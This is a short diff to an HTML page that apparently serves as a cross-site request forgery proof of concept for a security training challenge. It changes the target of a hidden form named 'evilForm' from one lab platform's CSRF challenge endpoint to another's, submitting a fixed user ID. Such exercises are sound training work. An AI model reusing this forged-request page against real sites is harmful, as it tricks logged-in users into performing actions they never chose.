--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet'>
 </HEAD>
 <H1 style="font-family:'Orbitron';font-size:18px;width:250px">hmm..wonder what this does.</H1>
-<form name="evilForm" action="https://securityshepherd.com/user/csrfchallengetwo/plusplus" method="POST">
+<form name="evilForm" action="https://security.codepath.com/user/csrfchallengeone/plusplus" method="POST">
     <input type="hidden" name="userId" value="121dd11bf97d0492aac80ef0f4b8beffc9734786" />
     <input type="submit"/>
 </form>
